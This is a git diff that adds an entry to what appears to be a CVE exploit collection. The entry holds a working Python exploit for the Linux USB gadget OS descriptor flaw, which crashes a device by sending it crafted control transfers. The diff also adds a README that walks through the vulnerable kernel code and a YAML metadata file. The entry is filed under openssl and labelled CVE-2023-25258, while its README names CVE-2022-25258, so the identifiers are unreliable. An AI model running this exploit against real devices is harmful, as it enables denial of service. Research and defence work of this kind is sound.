diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py new file mode 100644 index 0000000000000000000000000000000000000000..475ebc94a3d2667f03556540361e2fb4dca409b7 --- /dev/null +++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py @@ -0,0 +1,94 @@ +#!/usr/bin/python3 + +# +# Sample exploit to demonstrate Linux USB gadget +# subsystem's os descriptor handling flaws. +# +# This script requires pyusb. +# +# https://github.com/szymonh +# + +import argparse + +import usb.core + + +REQ_GET_DESCRIPTOR = 0x06 + + +def auto_int(val: str) -> int: + '''Convert arbitrary string to integer + Used as argparse type to automatically handle input with + different base - decimal, octal, hex etc. + ''' + return int(val, 0) + + +def parse_args() -> argparse.Namespace: + '''Parse command line arguments + ''' + parser = argparse.ArgumentParser( + description='Sample exploit for interface OS descriptor vulnerability' + ) + + parser.add_argument('-v', '--vid', type=auto_int, required=True, + help='vendor id') + parser.add_argument('-p', '--pid', type=auto_int, required=True, + help='product id') + + return parser.parse_args() + + +def print_request(req_type, req, val, idx, length): + '''Write control transfer request to stdout + ''' + print('{0:02X} {1:02X} {2:04X} {3:04X} {4:04X} '.format( + req_type, req, val, idx, length), end=' ') + + +def exploit(args: argparse.Namespace) -> None: + '''Attempt exploit the interface OS descriptor + Kernel will crash due to null pointer dereference and access + beyond array boundaries. + ''' + usbdev = usb.core.find(idVendor=args.vid, idProduct=args.pid) + if usbdev is None: + print('Device not found, verify specified VID and PID') + return + + for cfg in usbdev: + for idx in range(cfg.bNumInterfaces): + if usbdev.is_kernel_driver_active(idx): + usbdev.detach_kernel_driver(idx) + usbdev.set_configuration() + + data = usbdev.ctrl_transfer(0x80, REQ_GET_DESCRIPTOR, (0x03 << 8) | 0xee, 0x00, 0x12) + if not data or len(data) != 0x12: + print('OS descriptors are not supported') + exit(1) + + vendor_code = data[16] + print('Vendor code: {0}'.format(vendor_code)) + + bmRequestType = 0xc1 # USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_INTERFACE + bRequest = vendor_code # set to vendor code + wValue = 0x00 # upper byte needs to be zero, lower is the interface index + wIndex = 0x05 # needs to be 0x5 + payload = 4096 # value larger than 0x0A + + # iterate throught the c->interface array and beyond + for val in range(0x00, 0xff): + wValue = val + try: + print_request(bmRequestType, bRequest, wValue, wIndex, payload) + data = usbdev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, payload) + print('Read data: {0}'.format(data)) + except usb.core.USBError as e: + print(e) + + +if __name__ == '__main__': + '''Main script + ''' + exploit(parse_args()) \ No newline at end of file diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml new file mode 100644 index 0000000000000000000000000000000000000000..077affc1e8b33fe197f55398f1aaa7373dd29940 --- /dev/null +++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml @@ -0,0 +1,25 @@ +id: CVE-2023-25258 +source: https://github.com/szymonh/d-os-descriptor +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: MEDIUM + description: | + 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现了一个问题:USB小工具子系统缺少对接口操作系统描述符请求(具有大型数组索引的请求和与NULL函数指针检索关联的请求)的某些验证,因此可能会发生内存损坏。 + scope-of-influence: + Red Hat Enterprise Linux 9 + reference: + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.10 + - https://github.com/szymonh/d-os-descriptor + - https://github.com/torvalds/linux/commit/75e5b4849b81e19e9efe1654b30d7f3151c33c2c + - https://lists.debian.org/debian-lts-announce/2022/03/msg00011.html + - https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TCW2KZYJ2H6BKZE3CVLHRIXYDGNYYC5P/ + - https://security.netapp.com/advisory/ntap-20221028-0007/ + - https://www.debian.org/security/2022/dsa-5092 + - https://www.debian.org/security/2022/dsa-5096 + classification: + cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 4.6 + cve-id: CVE-2023-25258 + cwe-id: CWE-476 + tags: USB,Memory corruption \ No newline at end of file diff --git a/cve/openssl/2023/CVE_2023_25258/README b/cve/openssl/2023/CVE_2023_25258/README new file mode 100644 index 0000000000000000000000000000000000000000..bf3208bd56b839f1f95ff302310ca9ab07347832 --- /dev/null +++ b/cve/openssl/2023/CVE_2023_25258/README @@ -0,0 +1,56 @@ +#d-os-descriptor +##Summary +The USB Gadget Subsystem includes security issues in the OS descriptor handling section of composite_setup function (composite.c). Processing of properly crafted control transfer request messages result in device crash due to null pointer dereference or memory corruption. +##Description +The OS descriptor handling section of composite_setup for interface recipient is implemented as follows. +case USB_RECIP_INTERFACE: + if (w_index != 0x5 || (w_value >> 8)) + break; + interface = w_value & 0xFF; + buf[6] = w_index; + count = count_ext_prop(os_desc_cfg, + interface); + put_unaligned_le16(count, buf + 8); + count = len_ext_prop(os_desc_cfg, + interface); + put_unaligned_le32(count, buf); + value = w_length; + if (w_length > 0x0A) { + value = fill_ext_prop(os_desc_cfg, + interface, buf); + if (value >= 0) + value = min_t(u16, w_length, value); +} +break; +The interface variable is derived from w_value and later utilized to index usb_configuration->interface array in count_ext_prop, len_ext_prop and fill_ext_prop functions. Since c->interface array has the size of MAX_CONFIG_INTERFACES (16) elements and interface variable is not validated in neither composite_setup's OS descriptor handling section nor the called functions this allows an attacker to index the c->interface array past the actual boundaries. In case interface variable has a value greater or equal to MAX_CONFIG_INTERFACES the endpoint should be stalled. + +In certain cases, depending on actual memory content indexing past c->interface array may trigger buffer overflow of req->buf via fill_ext_prop when wLength is greater than 0x0A. If sum of ext_prop->name_len, ext_prop->data_len, 14 and 10 overflows int the count + n >= USB_COMP_EP0_OS_DESC_BUFSIZ condition would not be met allowing overflow via memcpy in usb_ext_prop_put_binary. Yet the probability of such situation seems pretty low. + +Furthermore the functions count_ext_prop, len_ext_prop and fill_ext_prop are missing validation if the *usb_function retrieved from c->interface array is actually valid resulting in null pointer dereference. When the retrieved usb_function pointer is null the endpoint should be stalled. +static int count_ext_prop(struct usb_configuration *c, int interface) +{ + struct usb_function *f; + int j; + + f = c->interface[interface]; + for (j = 0; j < f->os_desc_n; ++j) { + struct usb_os_desc *d; + + if (interface != f->os_desc_table[j].if_id) + continue; + d = f->os_desc_table[j].os_desc; + if (d && d->ext_compat_id) + return d->ext_prop_count; + } +return 0; +} +##Impact +Linux (and Android) devices exposing usb gadgets with OS descriptor support may be arbitrarily crashed by a malicious host by means of a single control transfer message. + +##CVE +CVE-2022-25258 + +##Patch +A patch addressing the described issue was accepted and is now available in supported kernel versions. For more information consult the below link. + +USB: gadget: validate interface OS descriptor requests \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 9280183190cb5781088a8c0d53c20d5363f5016d..25be14cf7e2859220f3c55904def65bfc55d6651 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -69,6 +69,7 @@ cve: - CVE-2022-2274 - CVE-2022-3602 - CVE-2023-25136 + - CVE-2023-25258 - CVE-2021-3449 - CVE-2022-0778 libxml2: